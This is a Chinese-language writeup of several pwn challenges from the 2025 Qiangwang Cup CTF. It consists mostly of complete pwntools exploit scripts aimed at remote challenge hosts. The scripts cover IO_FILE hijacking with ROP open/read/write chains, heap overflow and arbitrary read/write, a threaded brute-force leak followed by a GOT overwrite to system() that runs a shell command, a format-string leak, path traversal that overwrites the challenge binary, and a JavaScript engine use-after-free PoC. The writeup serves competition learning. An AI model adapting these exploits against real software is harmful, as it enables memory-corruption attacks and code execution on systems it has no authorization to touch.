README.mdx
21.8 KiB2025-10-21 13:02

#2025 强网杯初赛 Writeup

#Bph

乍一看是菜单堆,但是 create 只允许同时存在一个 note,edit 和 view 都是假的(只读 index),我一开始不确定是不是注册了什么 handler(但是我 ida 和 gdb 的结果都是一样的),token 函数可以在 libc/pie/stack 里三选一泄漏一个。

但是稍微尝试一下发现 create 时输入的 size 可以无限大,配合一开始的泄漏地址,那就相当于有了任意 libc 写 \x00 的原语。

这是一个很板子的问题,任意 libc 写 \x00 可以去打 stdin 实现二次的任意写,然后打 IOFILE 完成利用。当然最后一步也可以用 House of some 的板子一把梭。

from pwn import *
from sys import argv
from pwnlib.tubes.process import PIPE
context.terminal = ['tmux', 'splitw', '-h']
proc = "./chall"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
#io = process(proc, stdin=PIPE, stdout=PIPE)
io=remote('8.147.130.84',28680)
libc=ELF('./libc.so.6')
def choose(idx):
io.sendlineafter(b"Choice: ", str(idx).encode())

def create(size,content):
choose(1)
io.sendlineafter(b"Size: ", str(size).encode())
io.sendlineafter(b"Content: ", content)

payload=b'a'*0x26+b'b'
io.sendlineafter(b"Please input your token: ", payload)
io.recvuntil(b"ab\n")
leak = u64(io.recvuntil(b".\n", drop=True).ljust(8, b"\x00"))
log.info(f"leak => {hex(leak)}")
libc_base=leak-126-libc.sym['free']
#-0x2db899
log.info(f"libc_base => {hex(libc_base)}")

sleep(1)

_IO_2_1_stdin_=libc_base+libc.sym['_IO_2_1_stdin_']
_IO_buf_base=_IO_2_1_stdin_+0x39
_IO_list_all=libc_base+libc.sym['_IO_list_all']

stdout_addr=libc_base+libc.sym['_IO_2_1_stdout_']
fake_file_start=_IO_list_all-0x500
sleep(1)
create(_IO_buf_base,p64(stdout_addr)*0x4+p64(stdout_addr+0x210)+p64(0))

sleep(1)
payload=p64(stdout_addr)*0x3+p64(stdout_addr+0x210)
pop_rbp=libc_base+0x28a91
magic_gadget=libc_base+0x176F3E #mov rdx,qword ptr [rax+0x38];mov rdi,rax;call qword ptr [rdx+0x20]
setcontext=libc_base+libc.sym['setcontext']+61
fake_file_struct = flat(
{
# offset: value # field_name
0x0: 0, # _flags
0x8: pop_rbp, # _IO_read_ptr
0x10: fake_file_start + 0x470 - 8, # _IO_read_end
0x18: 1, # _IO_read_base
0x20: 0, # _IO_write_base
0x28: 1, # _IO_write_ptr
0x38: stdout_addr+0xe0-0x20,
# _IO_write_end (0x30) 到 _markers (0x60) 之间未设置的字段将被 flat 自动填充为0
0x68: magic_gadget, # _chain
# _fileno (0x70) 到 _shortbuf (0x83) 之间未设置的字段将被 flat 自动填充为0
0x88: fake_file_start - 0xc30, # _lock
# _offset (0x90) 将被 flat 自动填充为0
0x98: stdout_addr, # _codecvt
0xa0: stdout_addr - 0x48, # _wide_data
# _freeres_list (0xa8) 到 _unused2 (0xc4) 之间未设置的字段将被 flat 自动填充为0
0xd8: libc.sym['_IO_wfile_jumps'] + libc_base - 0x20 # vtable
},
filler=b'\x00'
)
pop_rax_ret=libc_base+0xdd237
pop_rdi_ret=libc_base+0x10f78b
pop_rsi_ret=libc_base+0x110a7d
syscall=libc_base+0x45539
payload2=fake_file_struct+p64(setcontext)+b'\x00'*(0xa0-0x20-0x28)+p64(0x0)+p64(0x40)+b'flag'+b'\x00'*4+b'\x00'*0x8+p64(stdout_addr+0x160)
payload2+=p64(pop_rax_ret)+p64(257)+p64(pop_rdi_ret)+p64(0xffffffffffffff9c)+p64(pop_rsi_ret)+p64(stdout_addr+0xe0+0x70)+p64(syscall)
payload2+=p64(pop_rax_ret)+p64(0)+p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(stdout_addr)+p64(syscall)
payload2+=p64(pop_rax_ret)+p64(1)+p64(pop_rdi_ret)+p64(1)+p64(syscall)

io.sendafter(b'Choice: ',payload2)

io.interactive()

#adventure

扔给 agent 逆向先,在 sub_1F974 地方似乎有个 0x80 字节的溢出写,购买商品还有整数溢出的漏洞

因此思路如下:

  • 利用整数溢出购买全部炸弹
  • 移动到 shadow dragon 的地区,和他开打
  • 用炸弹把他炸死
  • 得到戒指,改名时存在堆上的字符串数组的溢出
  • 在商店页面的卖出商品部分获得泄露的地址
  • 修改戒指的属性,使其还可以调用特别多次
  • 泄露 libc,利用溢出的任意地址读 + 任意地址写,慢慢构建 rop
from pwn import *

filename = './pwn'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
local = 0
all_logs = []
elf = ELF(filename)
libc = elf.libc

if local:
sh = process(filename)
else:
sh = remote('47.94.205.237', 28709)

def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
gdb.attach(pid, params)
pause()

def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)

def get_name():
sh.sendlineafter("Name: ", "warrior")

def move_s():
sh.sendlineafter("> ", 's')

def move_d():
sh.sendlineafter("> ", 'd')

def shop(index, nums):
sh.sendlineafter("> ", "shop")
sh.sendlineafter("option: ", "12")
sh.sendlineafter("buy : ", str(index))
sh.sendlineafter(": ", str(nums))
sh.sendline('')
sh.sendlineafter(": ", "14")

def shop2(index):
sh.sendlineafter("> ", "shop")
sh.sendlineafter("option: ", "12")
sh.sendlineafter("buy : ", str(index))
sh.sendline('')
sh.sendlineafter(": ", "14")

def shop_show():
sh.sendlineafter("> ", "shop")
sh.sendlineafter("option", "13")
sh.recvuntil("1 gold)\n ")
heap_leak = u64(sh.recv(6).ljust(8, b'\x00'))
sh.sendlineafter("sell: ", "3")
sh.sendline('')
sh.sendlineafter(": ", "14")
return heap_leak

def fight_dragon():
sh.sendlineafter("> ", "search")
sh.sendlineafter("action: ", "5")
sh.sendlineafter("item: ", '1')
sh.sendlineafter(": ", '500000')
sh.sendlineafter("item: ", "2")

def inv(payload, des):
sh.sendlineafter('> ', 'inv')
sh.sendlineafter("item : ", "4")
sh.sendlineafter("action: ", '1')
sh.sendlineafter("name : ", payload)
sh.recvuntil("description : ")
leak = u64(sh.recv(6).ljust(8, b'\x00'))
sh.sendlineafter("New description : ", des)
return leak

def calc_heap(addr):
s = hex(addr)[2:]
s = [int(x, base=16) for x in s]
res = s.copy()
for i in range(9):
res[3+i] ^= res[i]
res = "".join([hex(x)[2:] for x in res])
return res

def map():
sh.sendlineafter("> ", "map")

get_name()
shop(4, 8500600)

move_s()
move_s()
move_s()
move_d()

fight_dragon()

heap_leak = shop_show()
# leak_info("heap_leak", heap_leak)

heap_leak = int(calc_heap(heap_leak), 16)
leak_info("heap_leak", heap_leak)

# debug("b *$rebase(0x1FB13)")
# debug("b *$rebase(0x1FB50)")

shop(1, 10)
shop(2, 0x10)

payload = b'a'*0x40 + p64(heap_leak - 0x3f8 + 7)
des = b'x'*10
leak = inv(payload, des=des)
# leak_info("leak", leak)

payload = b'a'*0x40 + p64(heap_leak - 0x440)
des = b''
code_leak = inv(payload, des=des)

leak_info("code_leak", code_leak)
code_base = code_leak - 0x367b8
leak_info("code_base", code_base)

payload = b'a'*0x40 + p64(code_base + 0x372a8)
des = b'a'
libc_leak = inv(payload, des=des)
leak_info("libc_leak", libc_leak)

payload = b'a'*0x40 + p64(libc_leak - 0x1dd0)
des = b'a'
stderr = inv(payload, des=des)
leak_info("stderr", stderr)

libc.address = stderr - 0x21b6a0
leak_info("libc.address", libc.address)

payload = b'a'*0x40 + p64(heap_leak - 0x64e0)
des = b'a'
stack_leak = inv(payload, des=des)
leak_info("stack_leak", stack_leak)

# debug("b *$rebase(0x2A8E4)")
# map()

pop_rdi = 0x2a3e5 + libc.address
pop_rsi = 0x1518c2 + libc.address
pop_rdx_2 = 0x904a9 + libc.address
pop_rax = 0x45eb0 + libc.address
syscall = 0x91316 + libc.address
pop_rcx = 0x3d1ee + libc.address
pop_rsp = 0x35732 + libc.address
add_rsp_820 = 0x149878 + libc.address
xor_eax = 0x404f8 + libc.address
xor_edi_syscall = 0xd9c4c + libc.address
xor_edx_eax = 0xa8558 + libc.address

new_rop = stack_leak - 0xde0

rop_chain = [
xor_eax,
pop_rsi,
stack_leak-0xda8+8,
xor_edx_eax,
pop_rdx_2,
0x1011,
0x1011,
xor_edi_syscall
]

for i, gadget in enumerate(rop_chain):
payload = b'a'*0x40 + p64(new_rop + i*8)
des = p64(gadget)
inv(payload, des=des)

rop_start = stack_leak - 0x1620

payload = b'a'*0x40 + p64(rop_start)
des = p64(add_rsp_820)

# debug("b *$rebase(0xBA84)")
inv(payload, des=des)

final_rop = p64(pop_rax) + p64(10)
final_rop += p64(pop_rdi) + p64((stack_leak - 0xd48)&0xfffffffffffff000)
final_rop += p64(pop_rsi) + p64(0x1000)
final_rop += p64(pop_rdx_2) + p64(7)*2
final_rop += p64(syscall) + p64(stack_leak - 0xd48)
final_rop += asm(shellcraft.open("/flag"))
final_rop += asm(shellcraft.read(3, stack_leak, 0x40))
final_rop += asm(shellcraft.write(1, stack_leak, 0x40))
sh.send(final_rop)

sh.interactive()

#sockserver

出题人给了一个 webserver.py,一个 socket5 server,socket5 server里面自定义了一个菜单堆。

出题人给的 dockerfile 需要稍微改一下:

# 把原先的 COPY ./bin/ /home/ctf/ 替换成下面的
COPY ./sockserver /home/ctf/
COPY ./webserver.py /home/ctf/
RUN mkdir /home/ctf/web
COPY ./web/index.html /home/ctf/web/
COPY ./flag /home/ctf/
COPY ./monitor.sh /home/ctf/

洞主要就是以下几个:

  1. delete 函数里直接对 msg_cnt 减一,这就有可能导致 msg_cnt != cur_idx,按理说这俩应该是保持一致的,而 add 函数里又只对 msg_cnt 做了检测,所以理论上可以做到无限申请 + 数组越界
  2. 功能 5 提供了一个 sock 连接的能力,预期如果可以打个 ssrf 什么的直接看 /flag.html 就好了,但是得先创建这个文件,web 目录下只有 index.html
  3. 功能 6 clear_all 函数会把 msg 结构体 reset,但是不会重构指针,可以做 uaf
  4. 错误的,多线程不能打堆,不在一个 tps,花了三个小时写的 poc 贴上面了,血的教训
  5. 功能 5 的 Strcmp 可以用来侧信道 leak
  6. main msgbox `数组越界写,可以改 got

这是最终封装的 exp:

from pwn import *
import time
import threading
import socket

context.log_level = 'info'
context.arch = 'amd64'
context.os = 'linux'

libc = ELF("./libc.so.6")

class SOCK5Pwn:
def __init__(self, host="127.0.0.1", port=1080):
self.host = host
self.port = port
try:
self.io = remote(self.host, self.port, timeout=10)
except Exception as e:
while True:
info(f"Reconnecting due to error: {e}")
self.io = remote(self.host, self.port, timeout=10)
if self.io:
break
pass

def choose(self, method):
request = p8(5) + p8(1) + p8(method)
self.io.send(request)
response = self.io.recv(2)
if len(response) != 2:
return -1
ver, selected = response[0], response[1]
if ver != 5:
return -1
return selected

def _add(self, msg):
res = self.choose(3)
if res != 3: return None
self.io.recv(2)
self.io.send(msg)
result = self.io.recv(2)
# info(f"_add result: {result.hex()}")
if len(result) != 2: return False
return result[1] == 0x00

def _delete(self, msg):
res = self.choose(4)
if res != 4: return None
self.io.recv(2)
self.io.send(msg)
result = self.io.recv(2)
# info(f"_delete result: {result.hex()}")
if len(result) != 2: return False
return result[1] == 0x00

def _sock(self, content):
if self.choose(5) != 5: return False
if self.io.recv(2, timeout=3) != b'\x05\x01': return False
self.io.send(content)
result = self.io.recv(2)
if len(result) != 2 or result[1] != 0x00: return False

req = p8(5) + p8(1) + p8(0) + p8(3)
target_host = b'aaaaaaaa'
req += p8(len(target_host)) + target_host
req += p16(80)
self.io.send(req)
response = self.io.recv(10)
return len(response) == 10 and response[0] == 5

def _reset(self):
if self.choose(6) != 6: return False
result = self.io.recv(2)
if len(result) != 2: return False
return result[1] == 0x00

def system(self):
if self.choose(5) != 5: return False
if self.io.recv(2) != b'\x05\x01': return False
self.io.send(b"a\x00")
result = self.io.recv(2)
if len(result) != 2 or result[1] != 0x00: return False

target_host = b'cat /home/ctf/flag > /home/ctf/web/flag.html'
req = p8(5) + p8(1) + p8(0) + p8(3)
req += p8(len(target_host)) + target_host
req += p16(80)
self.io.send(req)
response = self.io.recv(10)
if len(response) != 10 or response[0] != 5: return False
return response[1] == 0x00

def close(self):
if self.io:
self.io.close()

def read_flag(self):
if self.choose(5) != 5:
return False
ack = self.io.recv(2, timeout=2)
if ack != b'\x05\x01':
return False
self.io.send(b"a\x00")
result = self.io.recv(2, timeout=200)
if len(result) != 2:
return False
status = result[1]
if status == 0x01:
return False
elif status == 0x00:
pass
else:
return False

target_host = '1.0.0.127'
target_port = 37151

req = p8(5) + p8(1) + p8(0) + p8(1)

ip = struct.unpack("!l", socket.inet_aton(target_host))[0]

req += p32(ip) + p16(target_port)
pause()
self.io.send(req)
response = self.io.recv(10, timeout=200)
if len(response) != 10:
return False
ver = response[0]
rep = response[1]
if ver != 5:
return False
if rep == 0x00:
self.io.send(b"GET /flag.html HTTP/1.1\r\nHost: localhost\r\n\r\n")
data = self.io.recvall(timeout=100)
info(f"Received data: {data}")
return True
else:
return False


def add(content):
try:
pwn = SOCK5Pwn()
pwn._add(content)
pwn.close()
except Exception as e:
pass


def delete(content):
try:
pwn = SOCK5Pwn()
res = pwn._delete(content)
pwn.close()
return res
except Exception as e:
return False


def reset():
try:
pwn = SOCK5Pwn()
pwn._reset()
pwn.close()
except:
pass


def sock(content):
try:
pwn = SOCK5Pwn()
res = pwn._sock(content)
pwn.close()
return res
except:
return False


sol = b""
sol_lock = threading.Lock()
byte_found_event = threading.Event()


def brute_worker(byte_range):
global sol
current_sol = sol
for j in byte_range:
if byte_found_event.is_set():
return

m = current_sol + p8(j) + b"\x00"
if sock(m):
with sol_lock:
if len(sol) == len(current_sol):
sol += p8(j)
info(f"Found byte => {hex(j)}")
byte_found_event.set()
return


def brute(num_threads=32):
global sol
sol = b""

info("Bruting first byte...")
for j in range(256):
if j % 0x10 == 9:
m = p8(j) + b"\x00"
if sock(m):
sol = p8(j)
info(f"Found first byte => {hex(j)}")
break

if not sol:
error("Failed to brute the first byte.")
return 0

for i in range(4):
info(f"Bruting byte position {i+2}...")
byte_found_event.clear()
threads = []
chunk_size = 256 // num_threads

for t_id in range(num_threads):
start_byte = t_id * chunk_size
start_byte = 1 if t_id == 0 else start_byte
end_byte = 256 if t_id == num_threads - 1 else (t_id + 1) * chunk_size
if start_byte >= end_byte:
continue
thread = threading.Thread(target=brute_worker, args=(range(start_byte, end_byte),))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

final_sol = b"\x00" + sol
res = u64(final_sol.ljust(8, b"\x00"))
return res


def run_tasks_in_batches(tasks, max_threads=16):
for i in range(0, len(tasks), max_threads):
batch = tasks[i:i+max_threads]
for t in batch:
t.start()
for t in batch:
t.join()


def parallel_add(count, content, max_threads=20):
info(f"Starting {count} parallel add requests (max {max_threads} threads at a time)...")
tasks = [threading.Thread(target=add, args=(content,)) for _ in range(count)]
run_tasks_in_batches(tasks, max_threads)
info("Parallel add requests finished.")


def parallel_add_delete(count, add_content, delete_content, max_threads=20):
info(f"Starting {count} parallel add/delete requests (max {max_threads} threads at a time)...")

def worker():
add(add_content)
delete(delete_content)

tasks = [threading.Thread(target=worker) for _ in range(count)]
run_tasks_in_batches(tasks, max_threads)
info("Parallel add/delete requests finished.")


if __name__ == '__main__':
addr = 0x000000000405050

parallel_add(100, b"a" * 0x20)

add(flat([0, 103, -3, addr - 1]))
add(b"\x00")

reset()

parallel_add_delete(100, b"c" * 0x20, b"b\x00")
add(flat([0, 102, -1, -1]))

info("Leaking libc address...")

leaked_addr = brute(num_threads=16)
if leaked_addr == 0:
error("Failed to leak address.")
exit()

libc.address = leaked_addr - 0x127900
info(f"libc base => {hex(libc.address)}")
info(f"system addr => {hex(libc.sym['system'])}")

reset()

parallel_add(100, b"a" * 0x20)

add(flat([0, 102, -0x104 + 1, libc.sym['system'] - 1]))
add(b"x" * 0x20)

info("Triggering system()...")
pwn = SOCK5Pwn()
if pwn.system():
success("Command executed! Check for the flag.")

pwn.close()
pwn = SOCK5Pwn()
pwn.read_flag()
pwn.close()

由于远程环境 10s 重启一次 sockserver,因此需要打快点,这里用多线程加速爆破。

#Flagmarket

由于格式化字符串存在 bss 上,而 bss 上存在溢出写,所以可以修改格式化字符串的内容,那么只需要每次 pay 的 Money 都不是 255 就可以无限 fmt,而 flag 又是读在堆上的,所以一次泄漏堆地址,然后读入 flag 地址再用 %s 打印即可。

from pwn import *
p = process('./chall')
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(b'255')
p.recvuntil(b'opened user.log, please report:')
p.sendline(b'q' * 0x100 + b'%9$p%12$s')
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
# gdb.attach(p, 'b *0x4014bc')
p.sendline(p64(0x4042C8))
p.recvuntil(b'0x')

heap_addr = int(p.recvuntil(b'we')[:-2], 16)
print(f'heap_addr: {hex(heap_addr)}')
flag = heap_addr + 0x1e0
p.recvuntil(b'exit')
p.sendline(b'1')
p.recvuntil(b'?')
p.sendline(p64(flag))
p.interactive()

#Filesystem

结构体如下:

struct filesystem{
char filename[0x30];
char content[0xa0];
short length;
size_t* fileptr;
};

想了半天没想出来怎么打,但是程序 的create_file 功能里面有路径穿越可以直接根据 dockerfile 里面的程序路径覆盖程序:

from pwn import *

filename = './chall'
context.arch='amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'neww']
local = 0
all_logs = []
elf = ELF(filename)
libc = elf.libc

if local:
sh = process(filename)
else:
sh = remote('8.147.135.195', 30722)

def debug(params=''):
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
params = "decompiler connect ida --host localhost --port 3662\n" + params
gdb.attach(pid, params)
pause()

def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)

def input_dirname(name):
sh.sendlineafter("input DirectoryName: ", name)

def creat_file(name, content):
sh.sendafter("> ", "1")
sh.sendafter("input filename (max length = 0x30): ", name)
sh.sendafter("input content (max length 0xa0): \n", content)

def open_file(name):
sh.sendafter("> ", "2")
sh.sendafter("input filename (max length = 0x30): ", name)

def edit_file(index, content):
sh.sendafter("> ", "3")
sh.sendlineafter("input file idx: ", str(index))
sh.sendafter("input content (max length 0xa0): \n", content)

def show_file(index):
sh.sendafter("> ", "4")
sh.sendlineafter("input file idx: ", str(index))


# os.system("rm ./temp/*")
input_dirname("/")

# debug("b *$rebase(0x1AA4)")
# name = b"/"*(0x30)
name = b"../../../../../../../home/ctf/chall"
content = b"/bin/sh"

creat_file(name, content)

sh.interactive()

#babyjs

实现 uaf 的 poc,来自 @Tplus 师傅

let a = [
"A",
"B",
"C"
];

Object.defineProperty(a, 0, {
configurable: true,
get() {
// console.log('getter(0) called on array "a"');

// // a.length = 1;
// // gc();

globalThis.spray = [];
for (let i = 0; i < 500; i++) {
spray.push("M");
}
// // getter 返回原始值 "A"
return "B";
}
});

console.log("Calling a.unique()...");

let new_arr = a.unique();

console.log("a.unique() returned. new_arr is:", new_arr);

JSON.stringify(new_arr);
Math.min(a[0]);


console.log("Script finished (you likely won't see this).");